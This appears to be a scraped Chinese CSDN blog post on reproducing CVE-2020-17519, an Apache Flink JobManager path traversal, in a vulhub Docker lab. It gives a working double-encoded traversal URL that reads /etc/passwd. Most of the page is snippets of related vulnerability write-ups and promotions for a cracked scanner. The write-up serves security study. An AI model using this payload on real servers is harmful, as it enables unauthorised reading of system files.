Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞

最新推荐文章于 2023-12-28 09:36:57 发布

Miss61005

最新推荐文章于 2023-12-28 09:36:57 发布

阅读量4.5k

点赞数 1

文章标签：安全 apache

本文链接：https://blog.csdn.net/weixin_47459844/article/details/124237437

版权

原理：

Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一项更改，允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

漏洞复现所用工具：

Ubuntu虚拟机，docker，vulhub环境。

漏洞复现：

docker-compose up -d

在这里插入图片描述

访问http://ip:8081，环境搭建成功，如下图所示
在这里插入图片描述
直接访问POC：

https://IP:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

在这里插入图片描述
漏洞复现成功。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Miss61005

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

HW漏洞集合(四)-ecology&nexus-yaml版

HWHXY的博客

04-14

2585

HW漏洞集合(四)-ecology&nexus-yaml版主要是ecology、nexus 31.ecology syncuserinfo sqli name: poc-yaml-ecology-syncuserinfo-sqli set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: GET path: >- /mobile/plugin/SyncUserIn

[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)

qq_51577576的博客

09-26

3496

[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日，Apache Flink官方发布安全更新，修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞，漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API，但其实现上存在多处缺陷，攻击者可通过REST API使用../跳目录实现系统任意文件读取。

参与评论您还未登录，请先登录后发表或查看评论

Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞复现

挚爱凝华的博客

04-13

3092

搭建环境浏览器访问ip:8081端口构造payload访问passwd文件原理：利用 JobManager 的 REST API，读取 JobManager 本地文件系统上的任意文件（JobManager 进程有权限能够读取到的文件）。修复漏洞：升级到1.11.3或1.12.0版本 ...

Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519)和Nginx 越界读取缓存漏洞漏洞复现

weixin_48739941的博客

04-11

445

1、Apache Flink jobmanager/logs Path Traversal(CVE-2020-17519) (1)漏洞原理攻击者可以利用 JobManager 的 REST API，读取 JobManager 本地文件系统上的任意文件（JobManager 进程有权限能够读取到的文件）。 (2)修复升级到1.11.3或1.12.0版本。 (3) cd vulhub/flink/CVE-2020-17519 切换目录。 (4)docker-compose up -d 启动。

[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)

Matrix42

01-07

2021

2021年1月5日，Apache Flink官方发布安全更新，修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞： CVE-2020-17519：攻击者可通过REST API使用…/跳目录实现系统任意文件读取； CVE-2020-17518：通过构造恶意的http header，可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API，但其实现上存在多处缺陷，导致目录遍历

D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)

jammny

02-04

2530

漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞，该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问)，该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞（CVE-2020-24580），在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏洞利

Apache Flink CVE-2020-17518/CVE-2020-17519 文件操作漏洞复现

m0_48520508的博客

01-21

565

0x00简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01漏洞概述 CVE-2020-17519 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.

Apache Flink jobmanager/logs 目录穿越漏洞复现

Tauil的博客

07-22

1201

这个错误的返回就是说明我们没有成功跳出当前web目录，说明他存在有URL检查，拦截了我们的访问，那么我们可以在进行一次编码，来一个编码的二次方。%2fpasswd//这是“…URL后面的，而且他还不会将这个文件名称的URL进行加密等操作，直接放到URL后面进行访问，诶我这么说可能不太明白，就直接看图吧。%252fetc%252fpasswd//这是“…，一直添加到他成功访问到文件就行，或者是直接加一长串，那肯定就能访问到了。，告诉我们请求错误，你要找的文件不在这，所以我们就需要继续在URL中添加。.....

Apache Flink漏洞（CVE-2020-17519）复现

玄道的网安博客

01-06

5908

简介 Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。漏洞概述 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。影响版本 1.11.0、1.11.1、1.11.2 环境搭建使用vulhub进行安装 Vulhub地址： https://github.com/vulhu...

CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)

05-30

该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。使用方法：Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行，漏洞地址输出在vul.txt中影响版本： Apache Flink 1.11.0、1.11.1、...

最新xray1.9.11高级版下载Windows/Linux

最新发布

weixin_43167326的博客

12-28

2517

xray 是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有: 检测速度快。发包速度快; 漏洞检测算法效率高。支持范围广。大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。高级可定制。通过配置文件暴露了引擎的各种参数，通过修改配置文件可以客制化功能。安全无威胁。xray 定位为一款安全辅助评估工具，而不是攻击工具

nexus 命令执行（CVE-2020-10204）复现

weixin_63124284的博客

11-01

1646

Nexus Repository Manager（NXRM）是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发，而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。

Flink本地运行WebUI日志问题

zhuang_wk的博客

09-05

6009

Flink程序运行后，在WebUI页面无法查看jobManager日志或者taskManager日志，归根结底是日志配置的问题，引入或修改相关日志文件配置项即可解决。

Flink日志文件配置

大数据进阶之路

06-16

6312

因为在正常的情况下，Flink的流数据是非常大的，有时候会使用print()打印数据自己查看，有时候为了查找问题会开启debug日志，就会导致日志文件非常大，通过Web UI查看对应的日志文件是会非常卡，所以首先将日志文件按照大小滚动生成文件，我们在查看时不会因为某个文件非常大导致Web UI界面卡，没法查看。 2.2 设置日志写入Kafka集群针对按照日志文件大小滚动生成文件的方式，可能因为某个错误的问题，需要看好多个日志文件，所以可以把日志文件通过KafkaAppender写入到kafka中，然后通过

xray1.9.4高级社区版下载

qq_49869351的博客

01-12

7752

xray因其方便的代理检测模式，高效率，易于使用，和多样的poc闻名于安全圈。就这23年初始，xray就更新了1.9.4版本。已经添加了许可证，进行了pj。供大家下载，并且内置了superxray图像化界面，非常方便。

nexus 远程代码执行（CVE-2020-10199/CVE-2020-10204）

小小猪的博客

12-28

1802

nexus 远程代码执行（CVE-2020-10199/CVE-2020-10204）漏洞介绍: Nexus Repository Manager（NXRM）是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发，而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的影响版本: Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 环境搭建：

Nexus Repository Manager 3 远程命令执行漏洞（CVE-2020-10204）,CVE-2020-11444 越权漏洞

weixin_44508748的博客

11-21

1903

Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中，存在一处任意EL表达式注入漏洞，这个漏洞是CVE-2018-16621的绕过。 CVE-2020-10199：Nexus Repository Manager OSS/PRo <=3.21.1，需有低权限账号。 CVE-2020-10204：Nexus Repository Manager OSS/PRo <=3.21.1，需有管理员账号。

Nexus Repository Manager 3 远程命令执行漏洞（CVE-2020-10199）

chaojixiaojingang

12-18

900

1.影响版本 Nexus Repository《=3.21.1 2.漏洞描述 Sonatype Nexus 是一个 Maven 的仓库管理系统，在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中，由于某处功能安全处理不当，导致经过授权认证的攻击者，可以在远程通过构造恶意的 HTTP 请求，在服务端执行任意恶意代码，获取系统权限。 3.环境准备攻击机器：Kali 192.168.157.130 受害机器：docker镜像:192.168.157.1

路径穿越（Path Traversal）详解